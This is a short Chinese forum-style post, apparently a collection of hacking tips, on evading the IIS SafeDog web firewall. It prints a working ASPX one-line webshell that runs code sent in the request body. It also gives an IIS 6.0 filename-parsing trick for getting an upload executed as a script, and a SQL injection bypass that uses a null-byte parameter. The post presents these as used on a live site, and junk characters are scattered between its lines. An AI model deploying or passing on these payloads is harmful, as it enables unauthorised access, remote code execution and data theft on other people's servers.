1、绕过IIS安全狗的一句话。
$ U" u# L; G3 ~4 X; y- s X/ {前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
& @- L5 J: f% W: }. C<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。0 @; L8 d8 U: h5 C% E4 L9 h( W
% K+ K/ q' o5 o& V$ J
2、IIS6.0解析漏洞遇到安全狗。; j4 v4 g F$ W$ t- L$ k
文件名为
6 Y% V* J9 l6 T4 ghttp://www.xxxxx.com/sh3llc0de.asp;1.jpg
! @; Q6 x. @$ P9 v! R* ?1 C
, D0 q& x% ^5 R9 ~! f这样的会被IIS安全狗果断屏蔽。
- P: {0 j1 Y% S8 v! Q. Q改成如下名称,IIS6一样会解析: i& M3 i3 M+ q7 I5 r5 y
www.xxxxx.com/;1.asp;1.jpg
+ O+ I% l$ P7 e ]) b' j
" a( ?5 I" a3 Z, g) W( O3、安全狗的注入绕过。
2 ]3 p% t3 D! x7 z0 N常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
" N# r7 G3 ?/ l5 t" ~但如果:: v0 y/ u+ ?; h+ P& Y
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
" W9 H' ?2 y$ t% q b7 z( z就可以成功绕过了。& B# u0 Z; `8 g6 [3 j
# R% W' v2 |8 z# R/ L
, n" q) f+ J' x) P8 g0 | |